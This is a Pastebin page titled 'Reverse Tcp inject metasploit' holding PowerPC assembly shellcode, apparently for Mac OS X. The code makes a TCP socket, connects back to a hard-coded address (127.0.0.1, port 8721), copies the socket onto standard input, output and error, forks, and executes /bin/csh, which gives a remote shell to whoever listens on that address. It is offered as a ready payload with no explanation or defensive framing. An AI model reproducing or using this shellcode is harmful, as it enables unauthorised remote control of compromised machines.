API tools faq
paste
emS-St1ks

Reverse Tcp inject metasploit

emS-St1ks
Jun 15th, 2012
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.98 KB | None | 0 0
raw download clone embed print report
  1. .globl _main
  2. .text
  3. _main:
  4. ;; socket
  5. li r3, 2
  6. li r4, 1
  7. li r5, 6
  8. li r0, 97
  9. sc
  10. xor r0, r0, r0
  11. mr r30, r3
  12.  
  13. bl _connect
  14. .long 0x00022211
  15. .long 0x7f000001
  16.  
  17. _connect:
  18. mflr r4
  19. li r5, 0x10
  20. li r0, 98
  21. mr r3, r30
  22. sc
  23. xor. r5, r5, r5
  24.  
  25. _setup_dup2:
  26. li r5, 2
  27.  
  28. _dup2:
  29. li r0, 90
  30. mr r3, r30
  31. mr r4, r5
  32. sc
  33. xor r0, r0, r0
  34. subi r5, r5, 1
  35. cmpwi r5, -1
  36. bnel _dup2
  37.  
  38. _fork:
  39. li r0, 2
  40. sc
  41. xor. r5, r5, r5
  42.  
  43. _execsh:
  44. xor. r5, r5, r5
  45. bnel _execsh
  46. mflr r3
  47. addi r3, r3, 28
  48. stw r3, -8(r1) ; argv[0] = path
  49. stw r5, -4(r1) ; argv[1] = NULL
  50. subi r4, r1, 8 ; r4 = {path, 0}
  51. li r0, 59
  52. sc ; execve(path, argv, NULL)
  53.  
  54. ; csh removes the need for setuid()
  55. path:
  56. .ascii "/bin/csh"
  57. .long 0x00414243
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!